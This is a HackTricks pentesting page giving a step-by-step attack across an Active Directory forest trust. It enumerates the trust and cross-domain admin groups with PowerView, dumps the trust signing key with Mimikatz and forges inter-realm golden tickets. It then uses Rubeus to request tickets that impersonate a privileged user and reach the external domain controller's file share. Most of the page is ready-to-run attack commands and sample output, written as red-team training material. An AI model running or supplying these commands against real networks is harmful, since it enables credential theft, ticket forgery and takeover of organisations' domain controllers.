hacktricks/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
Carlos Polop ed03e5afcf a
2024-07-19 01:15:55 +02:00

156 lines
7.5 KiB
Markdown

# External Forest Domain - OneWay (Inbound) or bidirectional
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
In this scenario an external domain is trusting you (or both are trusting each other), so you can get some kind of access over it.
## Enumeration
First of all, you need to **enumerate** the **trust**:
```powershell
Get-DomainTrust
SourceName : a.domain.local --> Current domain
TargetName : domain.external --> Destination domain
TrustType : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection : Inbound --> Inboud trust
WhenCreated : 2/19/2021 10:50:56 PM
WhenChanged : 2/19/2021 10:50:56 PM
# Get name of DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName
dnshostname
-----------
dc.domain.external
# Groups that contain users outside of its domain and return its members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain : domain.external
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain : domain.external
MemberName : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
DC=external
# Get name of the principal in the current domain member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins
# Get members of the cros-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName
MemberName
----------
crossuser
# Lets list groups members
## Check how the "External Admins" is part of the Administrators group in that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName : Administrators
MemberName : SUB\External Admins
SID : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup : True
IsDomain : True
# You may also enumerate where foreign groups and/or users have been assigned
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
```
In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
## Initial Access
If you **couldn't** find any **special** access of your user in the other domain, you can still go back to the AD Methodology and try to **privesc from an unprivileged user** (things like kerberoasting for example):
You can use **Powerview functions** to **enumerate** the **other domain** using the `-Domain` param like in:
```powershell
Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
```
{% content-ref url="./" %}
[.](./)
{% endcontent-ref %}
## Impersonation
### Logging in
Using a regular method with the credentials of the users who is has access to the external domain you should be able to access:
```powershell
Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
```
### SID History Abuse
You could also abuse [**SID History**](sid-history-injection.md) across a forest trust.
If a user is migrated **from one forest to another** and **SID Filtering is not enabled**, it becomes possible to **add a SID from the other forest**, and this **SID** will be **added** to the **user's token** when authenticating **across the trust**.
{% hint style="warning" %}
As a reminder, you can get the signing key with
```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local
```
{% endhint %}
You could **sign with** the **trusted** key a **TGT impersonating** the user of the current domain.
```bash
# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap
# Now you have a TGS to access the CIFS service of the domain controller
```
### Full way impersonating the user
```bash
# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap
# Now you have a TGS to access the CIFS service of the domain controller
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}